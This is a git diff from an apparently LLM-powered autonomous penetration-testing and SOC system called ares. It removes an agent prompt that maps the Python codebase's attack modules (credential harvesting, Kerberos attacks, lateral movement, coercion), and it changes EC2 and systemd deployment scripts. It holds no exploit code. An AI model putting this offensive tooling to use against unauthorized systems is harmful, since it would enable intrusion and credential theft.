diff --git a/.claude/agents/python-ares-expert.md b/.claude/agents/python-ares-expert.md deleted file mode 100644 index 4663ce3e..00000000 --- a/.claude/agents/python-ares-expert.md +++ /dev/null @@ -1,131 +0,0 @@ ---- -name: python-ares-expert -description: Expert on the Python ares codebase at ../ares (src/ares/). Use when you need to understand Python ares architecture, look up how something works in Python, find equivalent implementations, or answer questions about the original Python system before porting to Rust. -tools: Read, Glob, Grep, Bash -model: sonnet ---- - -You are an expert on the **Python ares codebase** located at `/Users/l/dreadnode/ares`. Your job is to answer questions about the Python implementation accurately by reading the actual source code. - -## Project Overview - -Ares is an autonomous security operations multi-agent system with: - -- **Red Team**: LLM-powered penetration testing with coordinator/worker architecture -- **Blue Team**: SOC alert investigation and threat hunting - -Built on the Dreadnode Agent SDK, rigging (LLM framework), and MITRE ATT&CK. - -## Codebase Layout - -``` -/Users/l/dreadnode/ares/ - src/ares/ - core/ # Core framework - dispatcher/ # Task dispatcher (routing, throttling, result processing, publishing) - worker/ # Worker agent (_worker.py, operations.py, prompts.py, dc_resolution.py) - orchestrator/ # Orchestrator (_orchestrator.py) - factories/ # Agent factories (red_agents.py, blue_factory.py) - replay/ # Deterministic replay - persistent_store/ # Persistent storage - blue_dispatcher/ # Blue team dispatcher - blue_worker/ # Blue team worker - models.py # ALL data models (Credential, Host, Hash, Target, SharedRedTeamState, etc.) - config.py # Configuration loading - state_backend.py # Redis state backend (red team) - blue_state_backend.py # Redis state backend (blue team) - task_queue.py # Redis task queue (red team) - blue_task_queue.py # Redis task queue (blue team) - redis_client.py # Redis client wrapper - recovery.py # Checkpoint/recovery - persistence.py # State serialization - workflows.py # Credential expansion workflows - engines.py # Question generation engines - correlation.py # Red-Blue correlation - evidence_validation.py # Evidence dedup/validation - k8s_executor.py # Kubernetes pod execution - lateral_analyzer.py # Graph-based lateral movement - messages.py # Inter-agent messages - orchestrator_client.py # Client for orchestrator communication - orchestrator_service.py # Orchestrator service pod - query_resilience.py # Query retry logic - remote.py # Remote K8s execution - templates.py # Jinja2 template loading - tracing.py # OpenTelemetry tracing - capability_registry.py # Agent capability registration - context_manager.py # LLM context window management - tool_retrieval.py # Dynamic tool loading - circuit_breaker.py # Circuit breaker pattern - tools/ - red/ # Red team tools - credential_discovery/ # discovery.py, harvesting.py, cracking.py, pilfering.py - reconnaissance.py # nmap, enum4linux, user/share enumeration - orchestrator.py # Dispatch functions - kerberos_attacks.py # Delegation, tickets, ADCS - lateral_movement.py # psexec, wmi, smb, evil-winrm - acl_attacks.py # bloodyAD, pywhisker, dacledit - privilege_escalation.py - coercion.py # PetitPotam, Coercer, relay - cve_exploits.py - reporting.py - common.py - blue/ # Blue team tools - investigation.py, grafana.py, query_templates.py, observability.py, actions.py, learning.py - shared/ - mitre.py # MITRE ATT&CK integration - agents/ - red/ # Red team agents (dynamic via factories) - blue/ - soc_investigator.py # SOC investigation orchestrator - integrations/ # Third-party integrations - reports/ # Report generation (investigation.py, redteam.py, blueteam.py) - eval/ # Evaluation framework - templates/ # Jinja2 prompt templates - redteam/agents/ # Per-role agent prompts (orchestrator.md.jinja, recon.md.jinja, etc.) - main.py # CLI entry point - cli_ops.py # CLI operations (loot, status, inject, etc.) - cli_blue_ops.py # Blue team CLI operations - cli_history.py # CLI history - tests/ # Test suite - docs/ - codemap.md # Full codebase map - red.md # Red team architecture (AUTHORITATIVE) - blue.md # Blue team workflow - config/ - multi-agent-production.yaml # Agent configurations -``` - -## Multi-Agent Architecture - -- **Orchestrator**: Central LLM coordinator, dispatches tasks, never executes tools directly -- **Workers**: RECON, CREDENTIAL_ACCESS, CRACKER, ACL, PRIVESC, LATERAL, COERCION -- **Communication**: Redis pub/sub + task queues -- **State**: Write-through cache (memory + Redis persistence) -- **Namespace**: `attack-simulation` in Kubernetes - -## Key Design Patterns - -1. **Write-through cache**: `SharedRedTeamState` in memory, persisted to Redis via `state_backend.py` -2. **Task queue**: Redis-based with priority routing in `task_queue.py` -3. **Result processing**: `dispatcher/result_processing.py` extracts credentials/hashes from tool output -4. **Publishing**: `dispatcher/publishing.py` broadcasts discovered credentials to all agents -5. **Recovery**: `recovery.py` can restore operation state from Redis checkpoints -6. **Factory pattern**: `factories/red_agents.py` maps AgentRole -> toolsets (ROLE_TOOLSETS) - -## How to Answer Questions - -1. **Always read the actual source files** before answering - don't guess from the layout alone -2. Start with the most relevant file based on the question -3. For architecture questions, read `docs/red.md` and `docs/codemap.md` -4. For model/data questions, read `src/ares/core/models.py` -5. For tool implementations, read the specific file in `src/ares/tools/red/` -6. For orchestration logic, read `src/ares/core/dispatcher/` and `src/ares/core/orchestrator/` -7. Be precise: include file paths, function names, and line numbers -8. When asked "how does X work", trace the full code path - -## Important Context - -- This codebase is being ported to Rust (the parent project at `/Users/l/dreadnode/ares-rust-cli/ares-rust/`) -- Questions will often be about understanding the Python implementation to inform the Rust port -- The Python codebase uses: rigging (LLM), loguru (logging), redis, kubernetes, cyclopts (CLI), pydantic (models) -- Domain conventions: `contoso.local` (primary), `fabrikam.local` (secondary), `192.168.58.x` subnet diff --git a/.taskfiles/ec2/Taskfile.yaml b/.taskfiles/ec2/Taskfile.yaml index bbe3514b..7528b8c1 100644 --- a/.taskfiles/ec2/Taskfile.yaml +++ b/.taskfiles/ec2/Taskfile.yaml @@ -161,21 +161,32 @@ tasks: "aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares-src.tar.gz /tmp/ares-src.tar.gz", "tar -xzf /tmp/ares-src.tar.gz -C " + $build_dir, "cd " + $build_dir + " && cargo build --profile dev-deploy -p ares-cli 2>&1", - "cp " + $build_dir + "/target/dev-deploy/ares /usr/local/bin/ares && chmod +x /usr/local/bin/ares", + "SRC=" + $build_dir + "/target/dev-deploy/ares", + "if [ ! -f \"$SRC\" ]; then echo ERROR: build artifact missing at $SRC; exit 1; fi", + "BUILD_RAW=$(sha256sum \"$SRC\"); BUILD_SHA=${BUILD_RAW%% *}", + "echo Build SHA: $BUILD_SHA", + "install -m 755 \"$SRC\" /usr/local/bin/ares", + "DEPLOY_RAW=$(sha256sum /usr/local/bin/ares); DEPLOY_SHA=${DEPLOY_RAW%% *}", + "echo Deploy SHA: $DEPLOY_SHA", + "if [ \"$BUILD_SHA\" != \"$DEPLOY_SHA\" ]; then echo ERROR: deployed sha differs from build artifact build=$BUILD_SHA deploy=$DEPLOY_SHA; exit 1; fi", "echo Deployed: && ls -lh /usr/local/bin/ares" ]}' > "$PARAMS_FILE" + # Clean cargo builds on a t3.medium can run 15-25 min — pre-EC2-reboot + # cache may be wiped, and incremental builds still need to relink. + # Allow 30 min total for both the SSM command itself and the local + # polling loop so we don't bail mid-build with a "InProgress" report. CMD_ID=$(aws ssm send-command \ --profile "{{.EC2_PROFILE}}" \ --region "{{.EC2_REGION}}" \ --instance-ids "$INSTANCE_ID" \ --document-name "AWS-RunShellScript" \ --parameters "file://$PARAMS_FILE" \ - --timeout-seconds 600 \ + --timeout-seconds 1800 \ --query "Command.CommandId" --output text) - # Poll for completion (up to 10 minutes) - for i in $(seq 1 300); do + # Poll for completion (up to 30 minutes) + for i in $(seq 1 900); do STATUS=$(aws ssm get-command-invocation \ --profile "{{.EC2_PROFILE}}" \ --region "{{.EC2_REGION}}" \ @@ -291,11 +302,25 @@ tasks: fi ls -lh "$BIN_PATH" + # Pin sha256 of what we're about to ship so the SSM deploy step can + # verify the binary that lands on /usr/local/bin/ares matches exactly. + # Without this, the cp can silently fail to overwrite (ETXTBSY, immutable + # attribute, symlink redirection, prior deploy race) and the task still + # reports success. + if command -v sha256sum >/dev/null 2>&1; then + BUILD_SHA=$(sha256sum "$BIN_PATH" | awk '{print $1}') + else + BUILD_SHA=$(shasum -a 256 "$BIN_PATH" | awk '{print $1}') + fi + echo -e "{{.INFO}} Build SHA: $BUILD_SHA" + mkdir -p target/.deploy + echo "$BUILD_SHA" > target/.deploy/ares.sha256 + echo -e "{{.INFO}} Uploading binary to s3://{{.BCP_BUCKET}}/{{.S3_DEPLOY_PREFIX}}/..." aws s3 cp "$BIN_PATH" "s3://{{.BCP_BUCKET}}/{{.S3_DEPLOY_PREFIX}}/ares" \ --profile "{{.EC2_PROFILE}}" --region "{{.EC2_REGION}}" - echo -e "{{.SUCCESS}} Binary staged in S3" + echo -e "{{.SUCCESS}} Binary staged in S3 (sha=$BUILD_SHA)" # Pull from S3 on EC2 via SSM + verify (skip for remote builds) - | @@ -316,11 +341,30 @@ tasks: echo -e "{{.INFO}} Pulling binaries from S3 to $INSTANCE_ID..." + EXPECTED_SHA="" + if [ -f target/.deploy/ares.sha256 ]; then + EXPECTED_SHA=$(cat target/.deploy/ares.sha256) + fi + PARAMS_FILE=$(mktemp) trap "rm -f $PARAMS_FILE" EXIT - jq -n --arg bucket "{{.BCP_BUCKET}}" --arg prefix "{{.S3_DEPLOY_PREFIX}}" \ - '{"commands": ["set -e; aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares /usr/local/bin/ares; chmod +x /usr/local/bin/ares; echo Deployed:; ls -lh /usr/local/bin/ares"]}' \ - > "$PARAMS_FILE" + jq -n \ + --arg bucket "{{.BCP_BUCKET}}" \ + --arg prefix "{{.S3_DEPLOY_PREFIX}}" \ + --arg expected_sha "$EXPECTED_SHA" \ + '{"commands": [ + "set -ex", + "aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares /tmp/ares.staged", + "STAGED_RAW=$(sha256sum /tmp/ares.staged); STAGED_SHA=${STAGED_RAW%% *}", + "echo Staged SHA: $STAGED_SHA", + "if [ -n \"" + $expected_sha + "\" ] && [ \"$STAGED_SHA\" != \"" + $expected_sha + "\" ]; then echo ERROR: S3 staged binary sha mismatch expected=" + $expected_sha + " staged=$STAGED_SHA; exit 1; fi", + "install -m 755 /tmp/ares.staged /usr/local/bin/ares", + "DEPLOY_RAW=$(sha256sum /usr/local/bin/ares); DEPLOY_SHA=${DEPLOY_RAW%% *}", + "echo Deploy SHA: $DEPLOY_SHA", + "if [ \"$STAGED_SHA\" != \"$DEPLOY_SHA\" ]; then echo ERROR: deployed sha differs from staged staged=$STAGED_SHA deploy=$DEPLOY_SHA; exit 1; fi", + "rm -f /tmp/ares.staged", + "echo Deployed: && ls -lh /usr/local/bin/ares" + ]}' > "$PARAMS_FILE" CMD_ID=$(aws ssm send-command \ --profile "{{.EC2_PROFILE}}" \ @@ -966,6 +1010,7 @@ tasks: SECRETS_ID: '{{.SECRETS_ID | default "ares/api-keys"}}' LLM_MODEL: '{{.LLM_MODEL | default ""}}' FLUSH_REDIS: '{{.FLUSH_REDIS | default "true"}}' + OPERATION_ID: '{{.OPERATION_ID | default ""}}' cmds: - | INSTANCE_ID=$(aws ec2 describe-instances \ @@ -981,7 +1026,11 @@ tasks: exit 1 fi - OP_ID="op-$(date -u +%Y%m%d-%H%M%S)" + if [ -n "{{.OPERATION_ID}}" ]; then + OP_ID="{{.OPERATION_ID}}" + else + OP_ID="op-$(date -u +%Y%m%d-%H%M%S)" + fi echo -e "{{.INFO}} Operation ID: $OP_ID" # Build target IPs JSON array @@ -1018,6 +1067,10 @@ tasks: ANTHROPIC_KEY=$(echo "$SECRETS" | jq -r .ANTHROPIC_API_KEY) GRAFANA_URL_VAL=$(echo "$SECRETS" | jq -r '.GRAFANA_URL // empty') GRAFANA_TOKEN_VAL=$(echo "$SECRETS" | jq -r '.GRAFANA_SERVICE_ACCOUNT_TOKEN // empty') + LOKI_URL_VAL=$(echo "$SECRETS" | jq -r '.LOKI_URL // empty') + if [ -z "$LOKI_URL_VAL" ]; then + LOKI_URL_VAL="{{.LOKI_URL}}" + fi DREADNODE_API_KEY=$(echo "$SECRETS" | jq -r '.DREADNODE_API_KEY // empty') OTEL_TRACES_ENDPOINT="{{.OTEL_TRACES_ENDPOINT}}" @@ -1035,6 +1088,9 @@ tasks: ENV_FILE_CMD="$ENV_FILE_CMD; echo 'GRAFANA_SERVICE_ACCOUNT_TOKEN=${GRAFANA_TOKEN_VAL}' >> /etc/ares/env" fi fi + if [ -n "$LOKI_URL_VAL" ]; then + ENV_FILE_CMD="$ENV_FILE_CMD; echo 'LOKI_URL=${LOKI_URL_VAL}' >> /etc/ares/env" + fi ENV_FILE_CMD="$ENV_FILE_CMD; echo 'ARES_DEPLOYMENT={{.EC2_DEPLOYMENT}}' >> /etc/ares/env" # OTEL: send traces to Alloy OTLP gateway → Tempo via HTTP/protobuf ENV_FILE_CMD="$ENV_FILE_CMD; echo 'OTEL_EXPORTER_OTLP_TRACES_ENDPOINT=${OTEL_TRACES_ENDPOINT}' >> /etc/ares/env" @@ -1053,6 +1109,7 @@ tasks: export ANTHROPIC_API_KEY='${ANTHROPIC_KEY}' export GRAFANA_URL='${GRAFANA_URL_VAL}' export GRAFANA_SERVICE_ACCOUNT_TOKEN='${GRAFANA_TOKEN_VAL}' + export LOKI_URL='${LOKI_URL_VAL}' export ARES_REDIS_URL=redis://127.0.0.1:6379 {{- if .LLM_MODEL}} export ARES_LLM_MODEL='{{.LLM_MODEL}}' diff --git a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl index 619a4bc2..0e1ff0dc 100755 --- a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl +++ b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl @@ -1,6 +1,11 @@ #!/bin/bash -# Launch ares orchestrator with environment variables -# Placeholders are substituted by the calling task via envsubst/sed +# Launch ares orchestrator in its own systemd transient unit so it (and any +# tool subprocesses it spawns) gets its own cgroup, separate from +# amazon-ssm-agent.service. Otherwise everything launched by SSM +# RunShellScript inherits SSM's cgroup and competes with it for memory — +# resulting in CONSTRAINT_MEMCG OOM-kills regardless of OOMScoreAdjust. +set -euo pipefail + export ARES_REDIS_URL=redis://127.0.0.1:6379 export RUST_LOG=info export ARES_OPERATION_ID='__ARES_PAYLOAD__' @@ -13,6 +18,7 @@ export DREADNODE_WORKSPACE='__DREADNODE_WORKSPACE__' export DREADNODE_PROJECT='__DREADNODE_PROJECT__' export GRAFANA_SERVICE_ACCOUNT_TOKEN='__GRAFANA_TOKEN__' export GRAFANA_URL='__GRAFANA_URL__' +export LOKI_URL='__LOKI_URL__' _llm_model='__ARES_LLM_MODEL__' if [ -n "$_llm_model" ] && [ "$_llm_model" = "${_llm_model#__}" ]; then export ARES_LLM_MODEL="$_llm_model" @@ -25,13 +31,57 @@ if [ -n "$_blue_model" ] && [ "$_blue_model" = "${_blue_model#__}" ]; then fi export ARES_DEPLOYMENT='__ARES_DEPLOYMENT__' export ARES_CONFIG=/etc/ares/config.yaml +export ARES_MAX_CONCURRENT_TASKS=8 _otel_endpoint='__OTEL_TRACES_ENDPOINT__' if [ -n "$_otel_endpoint" ] && [ "$_otel_endpoint" = "${_otel_endpoint#__}" ]; then export OTEL_EXPORTER_OTLP_TRACES_ENDPOINT="$_otel_endpoint" export OTEL_EXPORTER_OTLP_PROTOCOL='http/protobuf' export OTEL_RESOURCE_ATTRIBUTES='deployment.environment=staging,attack.team=red' fi + +mkdir -p /var/log/ares + +# Stop any prior orchestrator (transient unit or stray nohup process). +systemctl stop ares-orchestrator.service 2>/dev/null || true +systemctl reset-failed ares-orchestrator.service 2>/dev/null || true pkill -f 'ares orchestrator' 2>/dev/null || true sleep 1 -nohup /usr/local/bin/ares orchestrator >/var/log/ares/orchestrator.log 2>&1 & -echo "Orchestrator started (PID: $!)" + +# Spawn as a transient systemd service in system-ares.slice. --setenv=NAME +# (no value) inherits from current environment, preserving quoting that +# would otherwise be mangled by EnvironmentFile parsing of JSON payloads. +exec systemd-run \ + --unit=ares-orchestrator.service \ + --slice=system-ares.slice \ + --description="Ares Orchestrator (transient)" \ + --collect \ + --setenv=ARES_REDIS_URL \ + --setenv=RUST_LOG \ + --setenv=ARES_OPERATION_ID \ + --setenv=OPENAI_API_KEY \ + --setenv=ANTHROPIC_API_KEY \ + --setenv=DREADNODE_API_KEY \ + --setenv=DREADNODE_SERVER_URL \ + --setenv=DREADNODE_ORGANIZATION \ + --setenv=DREADNODE_WORKSPACE \ + --setenv=DREADNODE_PROJECT \ + --setenv=GRAFANA_SERVICE_ACCOUNT_TOKEN \ + --setenv=GRAFANA_URL \ + --setenv=LOKI_URL \ + --setenv=ARES_LLM_MODEL \ + --setenv=ARES_TOOL_DISPATCH \ + --setenv=ARES_BLUE_ENABLED \ + --setenv=ARES_BLUE_LLM_MODEL \ + --setenv=ARES_DEPLOYMENT \ + --setenv=ARES_CONFIG \ + --setenv=ARES_MAX_CONCURRENT_TASKS \ + --setenv=OTEL_EXPORTER_OTLP_TRACES_ENDPOINT \ + --setenv=OTEL_EXPORTER_OTLP_PROTOCOL \ + --setenv=OTEL_RESOURCE_ATTRIBUTES \ + --property=StandardOutput=append:/var/log/ares/orchestrator.log \ + --property=StandardError=append:/var/log/ares/orchestrator.log \ + --property=OOMScoreAdjust=-500 \ + --property=TasksMax=4096 \ + --property=MemoryHigh=8G \ + --property=MemoryMax=10G \ + /usr/local/bin/ares orchestrator diff --git a/.taskfiles/ec2/scripts/setup.sh b/.taskfiles/ec2/scripts/setup.sh index f073ecfd..858fcfd8 100755 --- a/.taskfiles/ec2/scripts/setup.sh +++ b/.taskfiles/ec2/scripts/setup.sh @@ -21,6 +21,46 @@ fi echo "=== Creating directories ===" mkdir -p /var/log/ares /etc/ares +echo "=== Removing legacy ares-worker@ unit (renamed in PR #226) ===" +if [ -f /etc/systemd/system/ares-worker@.service ]; then + for role in recon credential_access cracker acl privesc lateral coercion; do + systemctl disable --now "ares-worker@${role}.service" 2>/dev/null || true + done + rm -f /etc/systemd/system/ares-worker@.service +fi + +echo "=== Creating system-ares.slice with global memory cap ===" +cat >/etc/systemd/system/system-ares.slice <<'SLICE_EOF' +[Unit] +Description=Ares system slice (orchestrator + workers) +Before=slices.target + +[Slice] +MemoryMax=12G +MemoryHigh=10G +TasksMax=8192 +SLICE_EOF + +echo "=== Ensuring 4G swap file (OOM cushion) ===" +if [ ! -f /swapfile ] || [ "$(stat -c%s /swapfile 2>/dev/null || echo 0)" -lt 4000000000 ]; then + swapoff /swapfile 2>/dev/null || true + rm -f /swapfile + fallocate -l 4G /swapfile || dd if=/dev/zero of=/swapfile bs=1M count=4096 + chmod 600 /swapfile + mkswap /swapfile + swapon /swapfile + if ! grep -q '^/swapfile' /etc/fstab; then + echo '/swapfile none swap sw 0 0' >>/etc/fstab + fi +fi + +echo "=== Tuning OOM behavior (oom_kill_allocating_task, swappiness) ===" +cat >/etc/sysctl.d/90-ares.conf <<'SYSCTL_EOF' +vm.oom_kill_allocating_task = 1 +vm.swappiness = 10 +SYSCTL_EOF +sysctl -p /etc/sysctl.d/90-ares.conf >/dev/null + echo "=== Creating systemd worker template unit ===" cat >/etc/systemd/system/ares@.service <<'UNIT_EOF' [Unit] @@ -42,9 +82,19 @@ RestartSec=5 StandardOutput=append:/var/log/ares/%i.log StandardError=append:/var/log/ares/%i.log +# Contain child processes (netexec, hashcat, nmap, etc.) within this cgroup. +# Without these limits, runaway tool processes can OOM the entire system and +# take down the SSM agent (see: Apr 2026 incident). +Delegate=yes +Slice=system-ares.slice +MemoryHigh=1500M +MemoryMax=2G +TasksMax=256 + [Install] WantedBy=multi-user.target UNIT_EOF +systemctl daemon-reload echo "=== Installing cracking tools ===" if ! command -v hashcat >/dev/null 2>&1 || ! command -v john >/dev/null 2>&1; then diff --git a/.taskfiles/red/Taskfile.yaml b/.taskfiles/red/Taskfile.yaml index 73b2119a..b93cb879 100644 --- a/.taskfiles/red/Taskfile.yaml +++ b/.taskfiles/red/Taskfile.yaml @@ -19,12 +19,13 @@ tasks: # =========================================================================== multi: - desc: "Run multi-agent red team operation (usage: task red:multi [TARGET=dreadgoad] [DOMAIN=contoso.local] [TARGET_ENV=staging])" + desc: "Run multi-agent red team operation (usage: task red:multi [TARGET=dreadgoad] [DOMAIN=contoso.local] [TARGET_ENV=staging] [IPS=10.1.10.10,10.1.10.11])" silent: true vars: OPERATION_ID: '{{.OPERATION_ID | default ""}}' RESUME: '{{.RESUME | default "false"}}' TARGET_ENV: '{{.TARGET_ENV | default "staging"}}' + IPS: '{{.IPS | default ""}}' OPERATION_ID_COMPUTED: sh: | if [ -n "{{.OPERATION_ID}}" ]; then @@ -71,6 +72,14 @@ tasks: MODEL_OVERRIDE_ENV="ARES_MODEL_OVERRIDE={{.MODEL}}" fi + # When IPS is supplied, target IPs directly and skip EC2 Name-tag resolution + # (the orchestrator pod has no `aws` CLI). Otherwise default to AWS lookup. + if [ -n "{{.IPS}}" ]; then + TARGET_FLAGS="--ips {{.IPS}}" + else + TARGET_FLAGS="--resolve-targets --aws-profile {{.TARGET_PROFILE}} --aws-region {{.TARGET_REGION}}" + fi + # CLI auto-loads .env if present, or use --secrets-from 1password kubectl exec -i -n {{.K8S_NAMESPACE}} deploy/ares-orchestrator -- \ env $MODEL_OVERRIDE_ENV \ @@ -82,9 +91,7 @@ tasks: GRAFANA_URL="{{.GRAFANA_URL}}" \ ares --redis-url "{{.REDIS_URL}}" ops submit \ "{{.TARGET}}" "{{.DOMAIN}}" \ - --resolve-targets \ - --aws-profile "{{.TARGET_PROFILE}}" \ - --aws-region "{{.TARGET_REGION}}" \ + $TARGET_FLAGS \ --pin-active \ --operation-id "{{.OPERATION_ID_COMPUTED}}" \ --model "{{.MODEL}}" \ @@ -738,6 +745,7 @@ tasks: BLUE_ENABLED: '{{.BLUE_ENABLED | default "0"}}' BLUE_LLM_MODEL: '{{.BLUE_LLM_MODEL | default ""}}' EC2_DEPLOYMENT: '{{.EC2_DEPLOYMENT | default "alpha-operator-range"}}' + STRATEGY: '{{.STRATEGY | default "comprehensive"}}' RESOLVED_TARGETS: sh: | TARGET="{{.TARGET}}" @@ -867,7 +875,7 @@ tasks: # Build JSON payload for ARES_OPERATION_ID TARGET_IPS_JSON=$(echo "{{.RESOLVED_TARGETS}}" | tr ',' '\n' | sed 's/^/"/;s/$/"/' | paste -sd, - | sed 's/^/[/;s/$/]/') - ORCH_PAYLOAD="{\"operation_id\":\"{{.OPERATION_ID_COMPUTED}}\",\"target_domain\":\"{{.DOMAIN}}\",\"target_ips\":${TARGET_IPS_JSON},\"model\":\"{{.MODEL}}\"}" + ORCH_PAYLOAD="{\"operation_id\":\"{{.OPERATION_ID_COMPUTED}}\",\"target_domain\":\"{{.DOMAIN}}\",\"target_ips\":${TARGET_IPS_JSON},\"model\":\"{{.MODEL}}\",\"strategy\":\"{{.STRATEGY}}\"}" # Build orchestrator launch script from template ORCH_SCRIPT=$(mktemp) @@ -882,6 +890,7 @@ tasks: -e "s|__DREADNODE_PROJECT__|{{.DREADNODE_PROJECT}}|" \ -e "s|__GRAFANA_TOKEN__|${GRAFANA_SERVICE_ACCOUNT_TOKEN:-}|" \ -e "s|__GRAFANA_URL__|{{.GRAFANA_URL}}|" \ + -e "s|__LOKI_URL__|{{.LOKI_URL}}|" \ -e "s|__ARES_LLM_MODEL__|{{.MODEL}}|" \ -e "s|__ARES_BLUE_ENABLED__|{{.BLUE_ENABLED}}|" \ -e "s|__ARES_BLUE_LLM_MODEL__|{{.BLUE_LLM_MODEL}}|" \ diff --git a/.taskfiles/remote/orchestrator-wrapper-patch.json b/.taskfiles/remote/orchestrator-wrapper-patch.json index 9ee1be92..67009f79 100644 --- a/.taskfiles/remote/orchestrator-wrapper-patch.json +++ b/.taskfiles/remote/orchestrator-wrapper-patch.json @@ -8,7 +8,7 @@ "op": "replace", "path": "/spec/template/spec/containers/0/args", "value": [ - "echo \"ares orchestrator queue dispatcher starting\" >&2\nwhile true; do\n OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true)\n if [ -n \"$OP_REQUEST\" ]; then\n OP_ID=$(printf '%s\\n' \"$OP_REQUEST\" | sed -n 's/.*\"operation_id\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p')\n echo \"Starting operation: ${OP_ID:-unknown}\" >&2\n export ARES_OPERATION_ID=\"$OP_REQUEST\"\n ares orchestrator\n status=$?\n echo \"Operation ${OP_ID:-unknown} exited with status $status\" >&2\n fi\ndone" + "echo \"ares orchestrator queue dispatcher starting\" >&2\nwhile true; do\n OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true)\n case \"$OP_REQUEST\" in *\"\\\"operation_id\\\"\"*) ;; *) OP_REQUEST=\"\" ;; esac\n if [ -n \"$OP_REQUEST\" ]; then\n OP_ID=$(printf '%s\\n' \"$OP_REQUEST\" | sed -n 's/.*\"operation_id\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p')\n if [ -z \"$OP_ID\" ]; then\n echo \"Skipping malformed op request\" >&2\n continue\n fi\n echo \"Starting operation: $OP_ID\" >&2\n export ARES_OPERATION_ID=\"$OP_REQUEST\"\n ares orchestrator\n status=$?\n echo \"Operation $OP_ID exited with status $status\" >&2\n fi\ndone" ] } ] diff --git a/Cargo.lock b/Cargo.lock index c3ce37e8..82d86d55 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -118,6 +118,7 @@ dependencies = [ "chrono", "clap", "dotenvy", + "hickory-resolver", "redis", "regex", "rstest", @@ -189,6 +190,7 @@ dependencies = [ "anyhow", "approx", "ares-core", + "base64", "chrono", "redis", "regex", @@ -602,6 +604,12 @@ dependencies = [ "hybrid-array", ] +[[package]] +name = "data-encoding" +version = "2.11.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a4ae5f15dda3c708c0ade84bfee31ccab44a3da4f88015ed22f63732abe300c8" + [[package]] name = "der" version = "0.7.10" @@ -674,6 +682,18 @@ dependencies = [ "serde", ] +[[package]] +name = "enum-as-inner" +version = "0.6.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1e6a265c649f3f5979b601d26f1d05ada116434c87741c9493cb56218f76cbc" +dependencies = [ + "heck", + "proc-macro2", + "quote", + "syn", +] + [[package]] name = "equivalent" version = "1.0.2" @@ -998,6 +1018,51 @@ version = "0.4.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7f24254aa9a54b5c858eaee2f5bccdb46aaf0e486a595ed5fd8f86ba55232a70" +[[package]] +name = "hickory-proto" +version = "0.24.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "92652067c9ce6f66ce53cc38d1169daa36e6e7eb7dd3b63b5103bd9d97117248" +dependencies = [ + "async-trait", + "cfg-if", + "data-encoding", + "enum-as-inner", + "futures-channel", + "futures-io", + "futures-util", + "idna", + "ipnet", + "once_cell", + "rand 0.8.6", + "thiserror 1.0.69", + "tinyvec", + "tokio", + "tracing", + "url", +] + +[[package]] +name = "hickory-resolver" +version = "0.24.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cbb117a1ca520e111743ab2f6688eddee69db4e0ea242545a604dce8a66fd22e" +dependencies = [ + "cfg-if", + "futures-util", + "hickory-proto", + "ipconfig", + "lru-cache", + "once_cell", + "parking_lot", + "rand 0.8.6", + "resolv-conf", + "smallvec", + "thiserror 1.0.69", + "tokio", + "tracing", +] + [[package]] name = "hkdf" version = "0.12.4" @@ -1316,6 +1381,19 @@ dependencies = [ "serde_core", ] +[[package]] +name = "ipconfig" +version = "0.3.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4d40460c0ce33d6ce4b0630ad68ff63d6661961c48b6dba35e5a4d81cfb48222" +dependencies = [ + "socket2", + "widestring", + "windows-registry", + "windows-result", + "windows-sys 0.61.2", +] + [[package]] name = "ipnet" version = "2.12.0" @@ -1468,6 +1546,12 @@ dependencies = [ "vcpkg", ] +[[package]] +name = "linked-hash-map" +version = "0.5.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0717cef1bc8b636c6e1c1bbdefc09e6322da8a9321966e8928ef80d20f7f770f" + [[package]] name = "linux-raw-sys" version = "0.12.1" @@ -1495,6 +1579,15 @@ version = "0.4.29" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897" +[[package]] +name = "lru-cache" +version = "0.1.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "31e24f1ad8321ca0e8a1e0ac13f23cb668e6f5466c2c57319f6a5cf1cc8e3b1c" +dependencies = [ + "linked-hash-map", +] + [[package]] name = "lru-slab" version = "0.1.2" @@ -2261,6 +2354,12 @@ dependencies = [ "web-sys", ] +[[package]] +name = "resolv-conf" +version = "0.7.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1e061d1b48cb8d38042de4ae0a7a6401009d6143dc80d2e2d6f31f0bdd6470c7" + [[package]] name = "ring" version = "0.17.14" @@ -3615,13 +3714,19 @@ dependencies = [ "wasite", ] +[[package]] +name = "widestring" +version = "1.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "72069c3113ab32ab29e5584db3c6ec55d416895e60715417b5b883a357c3e471" + [[package]] name = "winapi-util" version = "0.1.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" dependencies = [ - "windows-sys 0.48.0", + "windows-sys 0.61.2", ] [[package]] @@ -3665,6 +3770,17 @@ version = "0.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5" +[[package]] +name = "windows-registry" +version = "0.6.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "02752bf7fbdcce7f2a27a742f798510f3e5ad88dbe84871e5168e2120c3d5720" +dependencies = [ + "windows-link", + 